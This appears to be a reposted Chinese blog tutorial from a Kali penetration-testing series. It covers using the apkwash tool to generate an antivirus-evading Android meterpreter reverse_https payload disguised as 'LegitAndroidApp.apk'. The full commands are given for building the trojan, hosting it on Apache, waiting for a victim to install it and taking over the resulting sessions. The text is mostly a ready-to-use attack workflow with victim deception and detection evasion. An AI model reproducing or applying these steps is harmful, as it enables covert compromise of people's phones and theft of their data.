欢迎回来,我的新手黑客
之前两期讲了如何使用msfvenom生成安卓有效载荷和如何利用获取到的meterpreter会话进行渗透攻击,今天来看一下如何对msfvenom生成的Payload进行免杀处理,这边我们会用到一个工具,使用该工具对Payload进行处理,该工具可以通过公众号后台回复APK面纱免费获取
首次运行时下载apktool.jar并将其放置在用户的/usr/local/bin目录中生成调试密钥库以进行签名
APKTool官网下载地址:
https://ibotpeaches.github.io/Apktool/
该工具的使用方法也蛮简单,一条命令就可以让完成
apkwash -p android/meterpreter/reverse_https LHOST=192.168.0.103 LPORT=443 -o LegitAndroidApp.apk
接下来稍微解释一下命令中出现的相关参数
-p | --payload <有效负载>这将设置由msfvenom生成的有效负载
LHOST |本地监听IP地址
LPORT |本地监听的端口
-o | --output <outfile.apk>这将设置创建的APK的名称以及输出apk文件
稍微解释一下命令中可能用到的相关参数
-p | --payload <有效负载>这将设置由msfvenom生成的有效负载
-o | --output <outfile.apk>这将设置创建的APK的名称以及输出apk文件
-x | --original <infile.apk>输入APK以将有效负载注入(以后更新)
-g | --generate使用默认值
-n | 生成有效负载 --newkey在签名
-v 之前生成一个新的调试密钥| --verbose不要屏蔽命令的输出
-d | --debug将/ tmp / payload文件保留在适当位置以供查看
-h | --help帮助信息
该工具使用msfvenom生成Payload之后,使用APKTool进行处理,可以从输出的日志信息中观察
处理过程中会出现提示信息
可以选择开启listener,该工具就自动使用msfconsole打开监听器,并设置相对应的参数
监听器设置完成,接下来开启apache,等待受害者下载并安装软件
service apache2 start
mv LegitAndroidApp.apk /var/www/html/
当受害者安装并打开软件,就收到了会话
使用sessions查看会话信息
sessions -l
进入会话,查看系统相关信息
sessions -i 1
sysinfo
查看本地时间以及进程信息
面纱效果可以自己测试,今天的分享就到这边
原创不易,帮我点点右下角的“在看”吧,欢迎转发跟同行分享,谢谢
原文始发于微信公众号(Kali渗透测试教程):【安卓渗透测试系列教程第三篇】安卓应用自动化面纱
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论